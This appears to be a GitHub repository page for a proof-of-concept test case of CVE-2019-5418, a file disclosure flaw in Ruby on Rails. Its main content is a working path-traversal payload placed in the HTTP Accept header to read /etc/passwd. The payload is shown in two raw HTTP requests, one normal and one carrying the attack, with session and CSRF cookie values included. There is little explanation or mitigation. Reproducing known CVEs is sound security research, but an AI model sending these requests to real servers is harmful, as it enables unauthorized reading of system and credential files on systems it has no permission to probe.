Skip to content

File Content Disclosure on Rails Test Case - CVE-2019-5418

Notifications You must be signed in to change notification settings

omarkurt/CVE-2019-5418

Repository files navigation

CVE-2019-5418 Test case

Run :

$ rails s

PoC :

Accept: ../../../../../../../../etc/passwd{{

Req 1 -

GET /shitblock HTTP/1.1
Host: REDACTED:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: diyarbakir_guzel_baglar_delale_lorke <------ CATCH
Content-Length: 306
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: firstVisit=1552167456698; CSRF-Token-HOYYT=grQmu9F3Y5hazpvr6T5TtWKj4HqPFhea; sessionid-HOYYT=i3VkCeXtjRJJHUxc7xEEjbecD53xbvaN
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

normal-request

Req 2 -

GET /shitblock HTTP/1.1
Host: REDACTED:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: ../../../../../../../../etc/passwd{{
Content-Length: 306
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: firstVisit=1552167456698; CSRF-Token-HOYYT=grQmu9F3Y5hazpvr6T5TtWKj4HqPFhea; sessionid-HOYYT=i3VkCeXtjRJJHUxc7xEEjbecD53xbvaN
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

PoC

Source : File Content Disclosure on Rail - CVE-2019-5418

About

File Content Disclosure on Rails Test Case - CVE-2019-5418

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published